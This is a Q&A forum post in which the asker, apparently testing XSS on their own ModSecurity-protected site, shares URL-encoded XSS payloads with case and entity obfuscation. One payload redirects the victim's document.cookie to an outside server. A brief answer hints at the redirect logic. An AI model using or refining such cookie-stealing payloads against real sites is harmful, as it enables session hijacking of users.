0

I am trying to learn about the XSS vulnerability and was testing some payloads in my website(with Mod_Security), but now I'm stuck and I don't know if it was a real vulnerability or a false positive, so follow the payload:

%3Ca+href%3D%22jAvAsCrIpT%26colon%3Bdocument.write%26lpar%3Bdocument.cookie%26rpar%3B%22%3EY%3C%2Fa%3E

The problem is, it just print the cookies in another page, is there any way to send that cookies to a "malicious page" and get them? I've tried something like that:

%3Ca+href%3D%22jAvAsCrIpT%26colon%3Bvoid%26lpar%3B(document.location='http://myserver/test.php?c='+escape(document.cookie))%26rpar%3B%22%3EY%3C%2Fa%3E

But no success, so, if anyone can give me a light I would appreciate.

Thanks in advance!

Jason S
  • 184,598
  • 164
  • 608
  • 970
mirasx
  • 1
  • 3
    Can you explain your config, eg. used engine (mod_security2 or libmodsecurity3), used rule set, main directives like `SecRuleEngine`? Also it would be fine to see a curl request how can we simulate your issue. – airween Feb 26 '22 at 07:55

1 Answers1

0

Think about the control flow a second and re-examine if calling 'location' actually forces a redirect or not.

Developer1
  • 1
  • 3